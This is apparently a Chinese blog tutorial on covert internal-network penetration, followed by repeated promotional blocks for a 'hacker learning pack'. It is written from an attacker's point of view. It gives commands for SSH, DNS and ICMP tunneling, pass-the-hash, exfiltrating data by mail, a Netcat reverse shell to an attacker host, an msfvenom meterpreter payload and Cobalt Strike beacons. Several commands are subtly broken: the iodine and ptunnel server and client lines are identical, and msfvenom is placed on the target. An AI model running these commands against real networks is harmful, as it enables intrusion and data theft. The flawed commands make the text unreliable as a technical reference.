网络安全攻防：20 种“不走寻常路”的内网渗透姿势（非常详细）从零基础入门到精通，收藏这篇就够了

渗透测试这玩意儿，最刺激的莫过于在对方严防死守的内网里“搞事情”。尤其是那种“铁公鸡”式的网络，内外完全隔离，想直接连出去？没门！这时候，就得拿出点真本事，玩点“野路子”，在不暴露自己的情况下，深入敌后。今天，就来扒一扒 20 种常见的内网渗透“骚操作”，绝对让你脑洞大开。

一、隧道和代理：曲线救国的艺术

（一）端口转发：借鸡生蛋，瞒天过海？

端口转发，说白了就是“借道超车”。通过一台“中间人”主机，把流量“偷渡”到目标主机，或者反过来，把目标主机的流量引到外部。这招的关键在于，找到一个可以信任（或者说容易攻破）的中间人。

1. 本地端口转发：把内网服务“搬”到本地

   想象一下，你想搞一台内网的数据库，但死活连不上。这时候，本地端口转发就派上用场了。通过 SSH，你可以把数据库的端口“映射”到本地，就像直接在本机访问一样。

   bash ssh -L 3306:192.168.1.100:3306 user@middle_host

   这条命令的意思是，把 192.168.1.100 这台机器上的 MySQL 服务（端口 3306），转发到我的本地 3306 端口。怎么样，是不是有点“乾坤大挪移”的味道？

2. 远程端口转发：让内网主机主动“献身”

   如果目标主机压根没法主动访问外网，那就得反着来，让它主动把流量“送”到攻击者的主机上。

   bash ssh -R 8080:localhost:80 user@attack_host

   这句命令，就把目标主机本地的 HTTP 服务（端口 80），转发到攻击者主机的 8080 端口。这招有点像“姜太公钓鱼”，愿者上钩。

（二）代理隧道：障眼法玩得溜，谁也拦不住

代理隧道，就是通过已有的主机或服务，绕过那些烦人的网络限制。就像孙悟空钻到妖怪肚子里，从内部瓦解敌人。

1. Socks 代理：灵活多变，无孔不入

   proxychains 这工具，简直是渗透测试的瑞士军刀。它可以让你的任何流量，都通过 Socks 代理服务器转发出去。

   bash proxychains nmap -sT -Pn internal_host

   这条命令，就是让 nmap 通过代理，扫描内网主机。

2. HTTP 代理：简单粗暴，效果拔群

   上传一个代理脚本到目标服务器，就能建立一条 HTTP 代理隧道。reGeorg 和 Proxifier 是这方面的老牌劲旅。

（三）DNS 隧道：瞒天过海，暗度陈仓

DNS 隧道，绝对是“黑科技”的代表。它利用 DNS 请求，把数据藏在 DNS 查询里，实现外部通信。要知道，即使 HTTP、HTTPS 被禁了，DNS 流量通常还是畅通无阻的。

1. 用 iodine 搭建 DNS 隧道：

   先在攻击者主机上架设 DNS 服务器：

   bash iodine -f -c -P password example.com

   然后在目标主机上运行客户端：

   bash iodine -f -c -P password example.com

   这样，一条隐秘的 DNS 数据通道就建立起来了。

（四）ICMP 隧道：用 Ping 命令“偷”数据，你敢信？

ICMP 隧道，就是利用 ICMP 流量（比如 Ping 命令）来传输数据。在某些变态的网络环境里，TCP/UDP 全被封锁，但 ICMP 却依然坚挺。

1. 用 Ptunnel 建立 ICMP 隧道：

   攻击者主机：

   bash ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22

   目标主机：

   bash ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22

   通过 ICMP 隧道，你就可以偷偷摸摸地传输数据了。

二、内网服务：就地取材，化腐朽为神奇

（五）内网横向移动：步步为营，蚕食鲸吞

内网横向移动，就是在内网里“攻城略地”。利用弱口令、漏洞或者域账户权限，拿下更多的机器。

1. 用 PsExec 远程执行命令：

   bash PsExec.exe \192.168.1.100 -u user -p password cmd.exe

   这条命令，可以在 192.168.1.100 这台机器上执行 cmd.exe，前提是你得有相应的用户名和密码。

2. Pass-the-Hash 攻击：拿到哈希，就能为所欲为？

   Pass-the-Hash 攻击，就是直接利用已经搞到的密码哈希，绕过密码验证。

   bash pth-winexe -U user%hash //192.168.1.100 cmd.exe

   有了哈希，你就能冒充用户，在内网里畅行无阻。

（六）利用内网“边角料”服务，也能找到突破口？

仔细检查目标主机，看看有没有什么内网的特殊服务，比如数据库、文件共享等等。这些服务，很可能成为你突破网络限制的跳板。

1. 利用内网数据库服务：

   通过内网数据库服务，和外部主机建立联系。比如，利用 MySQL 的 LOAD DATA INFILE 功能，把数据写入文件系统，再通过其他方式传出去。

2. 利用 SMB 隧道：

   通过 SMB 隧道，利用内网文件共享服务传输数据。

   bash smbclient //192.168.1.100/share -U user

   这条命令，就是用 SMB 客户端访问内网的文件共享服务。

（七）邮件、FTP：被遗忘的角落，往往有惊喜

有些内网环境，可能封锁了 HTTP/HTTPS，但对邮件、FTP 这些“老古董”却睁一只眼闭一只眼。

1. 用 SMTP 协议发邮件：

   bash echo "Data to exfiltrate" | mail -s "Subject" user@example.com

   把数据藏在邮件里发出去，够隐蔽吧？

2. 用 FTP 上传/下载文件：

   bash ftp -i 192.168.1.100

   通过 FTP，你可以偷偷地上传或者下载文件。

三、反向连接：主动权在我手

（八）反向 Shell 和反向隧道：让目标主机“倒戈”

反向 Shell 和反向隧道，就是让目标主机主动连接攻击者主机，建立一条反向通道。

1. 用 Netcat 建立反向 Shell：

   目标主机：

   bash nc -e /bin/sh attack_host 4444

   攻击者主机：

   bash nc -l -p 4444

   这样，你就拿到了目标主机的 Shell。

2. 用 Metasploit 建立反向 Shell：

   目标主机：

   bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_host LPORT=4444 -f exe -o shell.exe

   攻击者主机：

   bash msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost attack_host; set lport 4444; run"

   Metasploit 的反向 Shell，功能更强大，姿势更骚气。

（九）Cobalt Strike：团队协作，如虎添翼

Cobalt Strike 是内网渗透的利器，它的 Socks 代理功能，可以在目标主机无法连接外网的情况下，建立代理连接。

1. 用 Cobalt Strike 的 Socks 代理：

   在目标主机上运行 Beacon，然后：

   beacon> socks 8080

   这样，你就可以用代理工具，连接到目标主机了。

（十）SMB Beacon：隐蔽行动，神不知鬼不觉

SMB Beacon 是 Cobalt Strike 的独门绝技，通过 Windows 命名管道进行通信，隐蔽性极高。

1. 用 SMB Beacon 建立连接：

   创建一个 SMB 的 Listener 后：

   beacon> smb 192.168.1.100 445

   SMB Beacon 就建立起来了。

四、工具和脚本：十八般武艺，样样精通

（十一）reGeorg 和 Neo-reGeorg：老牌隧道工具，历久弥新

reGeorg 是一种常用的代理隧道工具，上传脚本到目标服务器的网站目录下，就能建立代理隧道。Neo-reGeorg 在此基础上增加了加密功能，更加安全。

1. 用 reGeorg 建立代理隧道：

   目标服务器：

   bash curl -o proxy.py http://example.com/reGeorg.py

   攻击者主机：

   bash python proxy.py -s http://192.168.1.100/reGeorg.py -l 8080 -r 192.168.1.200:80

   一条代理隧道就搞定了。

（十二）Pystinger：WebShell 也能玩出新花样？

Pystinger 通过 WebShell 实现内网 SOCK4 代理，端口映射可以使目标在不出网的情况下上线。

1. 用 Pystinger 建立代理：

   把 stinger_server.exe 上传到目标服务器，然后在公网 VPS 上运行 stinger_client：

   bash python stinger_client.py -s 192.168.1.100 -p 8080 -l 8081

   Pystinger 就能帮你建立代理连接。

（十三）Frp：内网穿透，无所不能

Frp 是一种内网穿透工具，可以在目标主机不通外网的情况下，通过已控的双网卡内网服务器建立通道。

1. 用 Frp 建立内网穿透：

   目标主机：

   bash ./frpc -c frpc.ini

   攻击者主机：

   bash ./frps -c frps.ini

   Frp 就能帮你打通内网通道。

（十四）其他工具和脚本：

除了上面这些，还有很多工具和脚本，可以用于突破内网不出网的场景。

1. 用 Chisel 建立隧道：

   目标主机：

   bash ./chisel client --reverse attack_host:8080 R:8081:localhost:80

   攻击者主机：

   bash ./chisel server --port 8080 --reverse

   Chisel 也是一款轻量级的隧道工具。

总结一下，内网渗透是一场斗智斗勇的游戏，需要你灵活运用各种技巧和工具，才能在对方的眼皮底下“搞事情”。记住，没有绝对的安全，只有不断学习和进化的黑客。
```

黑客/网络安全学习包

资料目录

1. 成长路线图&学习规划

2. 配套视频教程

3. SRC&黑客文籍

4. 护网行动资料

5. 黑客必读书单

6. 面试题合集

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！

4.护网行动资料

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

更多内容为防止和谐，可以扫描获取~

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*********************************